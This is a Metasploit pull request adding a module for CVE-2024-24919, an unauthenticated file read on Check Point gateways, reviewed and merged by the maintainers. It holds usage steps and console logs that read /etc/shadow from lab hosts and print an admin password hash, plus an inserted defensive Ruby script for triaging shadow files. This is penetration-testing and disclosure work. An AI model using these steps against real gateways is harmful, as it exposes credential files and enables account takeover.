
Auxiliary module for CVE-2024-24919 - Check Point Security Gateway arbitrary file read #19221

Merged
merged 8 commits into from
Jun 13, 2024

Conversation

remmons-r7
Contributor

This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. Password hashes read from disk may be cracked, potentially resulting in administrator-level access to the target device. This vulnerability is tracked as CVE-2024-24919.

Verification

  1. Start msfconsole
  2. use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919
  3. set RHOSTS <TARGET_IP_ADDRESS>
  4. set RPORT <TARGET_PORT>
  5. set TARGETFILE <TARGET_FILE_TO_READ>
  6. set STORE_LOOT false if you want to display file on the console instead of storing it as loot.
  7. run

Example usage

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 

Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       443              yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   STORE_LOOT  false            yes       Store the target file as loot
   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
   TARGETURI   /                yes       The URI path to Check Point Security Gateway
   VHOST                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
RHOSTS => 192.168.181.128
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 192.168.181.128

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded! 
admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
cp_routeevt:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cp_extensions:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

[*] Auxiliary module execution completed

I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!

Since Check Point has swapped out the download link on this page for a patched version, the link has been removed entirely.
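The module above hands the operator the raw contents of /etc/shadow, and the description notes that the hashes in it may be cracked. From the defender's side the first question after such an exposure is which of the listed accounts actually carry crackable material and which are locked. The following Ruby script is an added example, not code from this PR or from the Metasploit module: it parses shadow(5) lines in the format the module prints, classifies each password field, names the crypt(3) algorithm a cracker would need, and converts the last-change day count into a date. The SAMPLE_SHADOW text is constructed in the same shape as the module output shown above with a placeholder hash, and the function names are this example's own.

```ruby
require 'date'

# Constructed sample in the same format as the module output shown in the PR.
# The admin hash is a placeholder, not a real credential.
SAMPLE_SHADOW = <<~'SHADOW'
  admin:$6$saltsaltsalt$PLACEHOLDERHASHVALUE:14559:0:99999:8:::
  monitor:*:19886:0:99999:8:::
  root:*:19886:0:99999:7:::
  rpm:!!:19886:0:99999:7:::
  sshd:*:19886:0:99999:7:::
SHADOW

# crypt(3) hash identifiers, used to name the algorithm a cracker would need.
HASH_ALGORITHMS = {
  '1'  => 'md5crypt',
  '2a' => 'bcrypt', '2b' => 'bcrypt', '2y' => 'bcrypt',
  '5'  => 'sha256crypt',
  '6'  => 'sha512crypt',
  'y'  => 'yescrypt'
}.freeze

# shadow(5) stores dates as days since the Unix epoch.
EPOCH = Date.new(1970, 1, 1)

# Classify the second field of a shadow entry.
def classify_password_field(field)
  return :no_password if field.empty?          # empty field: login without a password
  return :locked if field.start_with?('*', '!') # '*', '!', '!!' or '!<hash>': unusable
  return :hashed if field.start_with?('$')      # modular crypt format, "$id$salt$hash"
  :legacy_descrypt                              # 13-character traditional DES crypt
end

# Parse one shadow(5) line into a hash of named fields.
def parse_shadow_line(line)
  fields = line.chomp.split(':', -1)
  raise ArgumentError, "expected 9 fields, got #{fields.size}: #{line.inspect}" unless fields.size == 9

  name, pw, last_change, _min_age, max_age, _warn, _inactive, _expire, _reserved = fields
  status = classify_password_field(pw)
  # For "$6$salt$hash", split('$') yields ["", "6", "salt", "hash"], so [1] is the id.
  algorithm = status == :hashed ? HASH_ALGORITHMS.fetch(pw.split('$')[1], 'unknown') : nil

  {
    name: name,
    status: status,
    algorithm: algorithm,
    last_change: last_change.empty? ? nil : EPOCH + Integer(last_change), # empty: never changed
    max_age: max_age.empty? ? nil : Integer(max_age),
    never_expires: max_age == '99999' # the de facto "password never expires" value
  }
end

# Parse a whole shadow file (blank lines skipped) into an array of entries.
def triage_shadow(text)
  text.each_line.reject { |l| l.strip.empty? }.map { |l| parse_shadow_line(l) }
end

# Accounts whose credential is usable by whoever holds this file: a real hash
# (offline cracking target) or no password at all. These get rotated first.
def exposed_accounts(text)
  triage_shadow(text)
    .select { |e| %i[hashed legacy_descrypt no_password].include?(e[:status]) }
    .map { |e| e[:name] }
end

if $PROGRAM_NAME == __FILE__
  triage_shadow(SAMPLE_SHADOW).each do |e|
    changed = e[:last_change] ? e[:last_change].iso8601 : 'never'
    puts format('%-14s %-16s %-12s last change %s%s',
                e[:name], e[:status], e[:algorithm] || '-', changed,
                e[:never_expires] ? ' (no expiry)' : '')
  end
  puts "Rotate first: #{exposed_accounts(SAMPLE_SHADOW).join(', ')}"
end
```

Run it against a loot file with `ruby triage.rb < /dev/null` after replacing SAMPLE_SHADOW with `File.read(path)`; on the sample it reports only admin as crackable (sha512crypt, last changed 2009-11-11, no expiry), while monitor, root, rpm and sshd are locked. The last-change conversion is worth keeping: a hash that has not changed in years has had that long to leak from backups and images, independent of this particular bug.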

@jheysel-r7 jheysel-r7 left a comment


Thanks for the great module @remmons-r7! Also for the steps to set up the test environment 👍 A couple of minor comments but other than those it looks good to go.

Testing

STORE_LOOT = true

msf6 > db_connect msf_user:notpassword@127.0.0.1:5432/msf_database
[*] Connected to Postgres data service: 127.0.0.1/msf_database
msf6 > use gather/checkpoint_gateway_fileread_cve_2024_24919
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set STORE_LOOT true
STORE_LOOT => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] Stored the file data to loot...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > loot

Loot
====

host           service  type    name         content     info                                                path
----           -------  ----    ----         -------     ----                                                ----
172.16.199.52           shadow  /etc/shadow  text/plain  File read from Check Point Security Gateway server  /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
[*] exec: cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt

admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) >

STORE_LOOT = false

msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded!
admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::

[*] Auxiliary module execution completed

remmons-r7 and others added 5 commits June 13, 2024 08:06
From peer review suggestion.

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
From peer review suggestion.

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
From peer review suggestion.

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Secondary commit from peer review suggestion.
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 13, 2024
@jheysel-r7 jheysel-r7 merged commit 35d161b into rapid7:master Jun 13, 2024
39 checks passed
@jheysel-r7

Release Notes

This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. This vulnerability is tracked as CVE-2024-24919.
